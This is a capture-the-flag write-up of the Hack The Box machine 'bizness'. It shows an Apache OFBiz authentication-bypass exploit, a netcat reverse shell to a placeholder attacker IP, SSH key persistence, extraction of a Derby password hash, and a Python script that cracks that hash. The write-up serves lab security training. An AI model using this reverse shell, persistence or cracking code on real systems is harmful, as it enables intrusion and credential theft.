HTB: bizness Writeup


Machine Information

Attribute      Details
Name           bizness
OS             Linux
Difficulty     Easy
Points         N/A
Release Date   N/A
IP Address     bizness.htb
Author         D3vnomi

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐☆☆☆
  • Real-world: ⭐⭐⭐☆☆
  • CVE: ⭐⭐☆☆☆
  • CTF-like: ⭐⭐☆☆☆

Summary

bizness is an Easy-difficulty Linux machine running Apache OFBiz. The attack exploits CVE-2023-49070/CVE-2023-51467 (Apache OFBiz Authentication Bypass) to gain initial access as the ofbiz user, establishes SSH persistence, and escalates to root by extracting and cracking the Derby database admin password hash.

TL;DR: Reconnaissance → Authentication Bypass (RCE) → Reverse Shell → SSH Persistence → Hash Extraction → Privilege Escalation → Root.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- bizness.htb

Results:

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH (version unspecified)
80/tcp open http nginx 1.18.0 (redirects to HTTPS)
443/tcp open https nginx 1.18.0

Key Finding: Port 80 redirects to HTTPS. The service is powered by Apache OFBiz with nginx frontend.

Service Enumeration

Hostname: bizness.htb

Web Technologies Detected:

  • Apache OFBiz (backend)
  • nginx 1.18.0 (frontend)
  • jQuery v3.2.1
  • Bootstrap
  • Contact Email: info@bizness.htb

Add the hostname to /etc/hosts so the nginx virtual host resolves:

echo "10.10.16.78 bizness.htb" >> /etc/hosts

Directory Enumeration

gobuster dir -u https://bizness.htb -w /usr/share/wordlists/dirb/common.txt -k

Key Discoveries:

  • /control/login — OFBiz admin login panel
  • /solr/admin — Solr admin interface

Vulnerability Assessment

Identified Vulnerabilities:

  • CVE-2023-49070 / CVE-2023-51467 — Apache OFBiz Authentication Bypass leading to Remote Code Execution
    • Allows unauthenticated users to bypass authentication in OFBiz administrative panels
    • Can be leveraged to execute arbitrary commands on the system

Initial Foothold

Exploitation: CVE-2023-49070 / CVE-2023-51467 (Authentication Bypass RCE)

Exploit Source: https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass

The vulnerability allows unauthenticated remote code execution through the OFBiz administrative interface by bypassing authentication checks.

Setup Listener:

nc -lvnp 4444

Execute Exploit:

The exploit delivers a command to the target through the authentication bypass; the payload used here is a reverse shell back to the listener:

nc -e /bin/bash <attacker_ip> 4444

This establishes a reverse shell as the ofbiz user.

Stabilizing the Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

Establishing SSH Persistence

mkdir -p /home/ofbiz/.ssh
echo "your_public_key_here" > /home/ofbiz/.ssh/authorized_keys
chmod 700 /home/ofbiz/.ssh
chmod 600 /home/ofbiz/.ssh/authorized_keys

Connect via SSH:

ssh ofbiz@bizness.htb

Initial Enumeration

scp -r ofbiz@bizness.htb:/opt/ofbiz ~/ofbiz_files

Key files identified:

  • /opt/ofbiz/Dockerfile — Reveals hashing algorithm details
  • /opt/ofbiz/docker-entrypoint.sh — Password hashing mechanism
  • /opt/ofbiz/SECURITY.md — Security documentation

User Compromise

The initial reverse shell is executed as the ofbiz system user, providing direct user-level access without additional credential extraction.

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>


Privilege Escalation

Enumeration

sudo -l
find / -perm -4000 -type f 2>/dev/null
ps aux
linpeas.sh

Key Finding: Apache OFBiz stores user credentials in the Derby embedded database.

Derby Database Hash Extraction

Database Location:

ls -la /opt/ofbiz/runtime/data/derby/

The Derby database stores hashed credentials. The admin user's hash was found in the .dat files under this directory; the value is shown as it appears in the raw file, preceded by the username:

admin$"$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN

Hash Format: $SHA$[salt]$[base64_hash]

  • Hash type: SHA (Java's name for SHA-1)
  • Salt: d
  • Digest: URL-safe base64-encoded SHA-1 hash, with the base64 '=' padding stripped

Hashing Algorithm Analysis

From /opt/ofbiz/docker-entrypoint.sh, the password hashing mechanism is:

  1. Concatenate salt + password
  2. SHA-1 hash the combined string
  3. URL-safe base64 encode the digest and strip the '=' padding
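The hash format and the three hashing steps above, as an added example (not code from the original writeup or from OFBiz itself): a parser for the stored "$type$salt$digest" string that tolerates the leading username bytes from the raw .dat dump, the digest routine, and a verifier that checks a candidate password against a stored hash. Only the "SHA" type is confirmed on this machine; the SHA-256/SHA-512 entries are an assumption based on Java MessageDigest naming.

```python
import base64
import hashlib
import hmac

# OFBiz writes credentials as "$<type>$<salt>$<digest>". "SHA" (Java's name
# for SHA-1) is what this box uses; the other entries are assumed from Java
# MessageDigest naming and are not confirmed on the page.
HASH_TYPES = {"SHA": "sha1", "SHA-256": "sha256", "SHA-512": "sha512"}


def ofbiz_digest(hash_type, salt, password):
    """Steps 1-3 above: digest(salt + password), URL-safe base64, '=' padding stripped."""
    h = hashlib.new(HASH_TYPES[hash_type])
    h.update(salt.encode("utf-8"))
    h.update(password.encode("utf-8"))
    return base64.urlsafe_b64encode(h.digest()).decode("ascii").rstrip("=")


def make_ofbiz_hash(hash_type, salt, password):
    """Build a complete stored credential string such as '$SHA$d$<digest>'."""
    return f"${hash_type}${salt}${ofbiz_digest(hash_type, salt, password)}"


def parse_ofbiz_hash(stored):
    """
    Return (hash_type, salt, digest) from a stored credential.
    The last three '$'-separated fields are used, so leftover bytes in front
    of the value (the admin$" prefix seen in the raw Derby .dat dump) are ignored.
    """
    parts = stored.split("$")
    if len(parts) < 4:
        raise ValueError(f"not an OFBiz credential string: {stored!r}")
    hash_type, salt, digest = parts[-3], parts[-2], parts[-1]
    if hash_type not in HASH_TYPES:
        raise ValueError(f"unsupported hash type {hash_type!r}")
    return hash_type, salt, digest


def verify_ofbiz_password(stored, candidate):
    """True if candidate reproduces the stored digest (constant-time comparison)."""
    hash_type, salt, digest = parse_ofbiz_hash(stored)
    return hmac.compare_digest(ofbiz_digest(hash_type, salt, candidate), digest)


if __name__ == "__main__":
    # The hash string exactly as it appeared in the .dat file on this machine
    print(parse_ofbiz_hash('admin$"$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN'))
    # Round trip with a constructed password (not the real admin password)
    sample = make_ofbiz_hash("SHA", "d", "constructed-password")
    print(sample, verify_ofbiz_password(sample, "constructed-password"))
```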

Custom Hash Cracking Script

hash_decryptor.py:

import hashlib
import base64


def crack_hash(target_hash, salt, wordlist):
    """
    Crack the OFBiz password hash.
    target_hash: URL-safe base64-encoded SHA-1 digest without '=' padding
    salt: the salt value (the field between the second and third '$')
    wordlist: path to password wordlist
    """
    # Read the wordlist as bytes: rockyou.txt contains lines that are not
    # valid UTF-8 and would raise UnicodeDecodeError in text mode.
    with open(wordlist, 'rb') as f:
        for line in f:
            password = line.rstrip(b'\r\n')
            # Concatenate salt + password, in that order, as OFBiz does
            combined = salt.encode() + password
            # SHA-1 hash
            hash_obj = hashlib.sha1(combined)
            # Base64 encode (URL-safe, no padding)
            encoded = base64.urlsafe_b64encode(hash_obj.digest()).decode().rstrip('=')
            if encoded == target_hash:
                return password.decode(errors='replace')
    return None


# Extract components from: admin$"$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN
salt = "d"
target_hash = "uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN"
wordlist = "/path/to/rockyou.txt"
password = crack_hash(target_hash, salt, wordlist)
if password:
    print(f"Password found: {password}")
else:
    print("Password not found in wordlist")

Usage:

python3 hash_decryptor.py

Root Access

Once the admin password is cracked, use it to escalate privileges or directly access the root user account.

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A["Reconnaissance"] --> B["Directory Enumeration"]
B --> C["Identify OFBiz /control/login"]
C --> D["Exploit CVE-2023-49070/51467"]
D --> E["Reverse Shell - ofbiz user"]
E --> F["SSH Persistence"]
F --> G["Access /opt/ofbiz"]
G --> H["Extract Derby Database Hash"]
H --> I["Crack Admin Hash rockyou.txt"]
I --> J["Privilege Escalation"]
J --> K["Root Access"]

Tools Used

Tool                                Purpose
nmap                                Port scanning and service fingerprinting
gobuster                            Directory enumeration (found /control/login, /solr/admin)
Apache-OFBiz-Authentication-Bypass  CVE-2023-49070/51467 exploit
nc / netcat                         Reverse shell listener and handler
ssh / scp                           Secure shell and file transfer
python3                             Hash cracking script development
linpeas                             Linux privilege escalation enumeration
hashlib                             SHA-1 hashing for password cracking
base64                              Hash encoding/decoding

Vulnerability Reference

#  Vulnerability   Component       Severity  Impact
1  CVE-2023-49070  Apache OFBiz    Critical  Authentication Bypass - Unauthenticated RCE
2  CVE-2023-51467  Apache OFBiz    Critical  Authentication Bypass - Unauthenticated RCE
3  Weak Hashing    Derby Database  High      Password hash extractable and crackable with wordlist

Key Learnings

  • Authentication bypass vulnerabilities in enterprise applications (OFBiz) can provide immediate RCE without credentials.
  • Directory enumeration discovers hidden administrative panels (/control/login) that may be vulnerable.
  • Embedded databases (Derby) store password hashes that can be extracted and cracked offline using wordlists.
  • Understanding the target’s hashing algorithm (salt + SHA-1 + base64) is critical for successful password cracking.
  • Establishing SSH persistence provides reliable access for further exploitation and enumeration.
  • Application configuration files and source code (Dockerfile, docker-entrypoint.sh) reveal security implementation details.
  • Privilege escalation often comes from database access rather than traditional privilege escalation vulnerabilities.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #CVE-2023-49070 #CVE-2023-51467 #ApacheOFBiz #AuthenticationBypass #Derby #PasswordCracking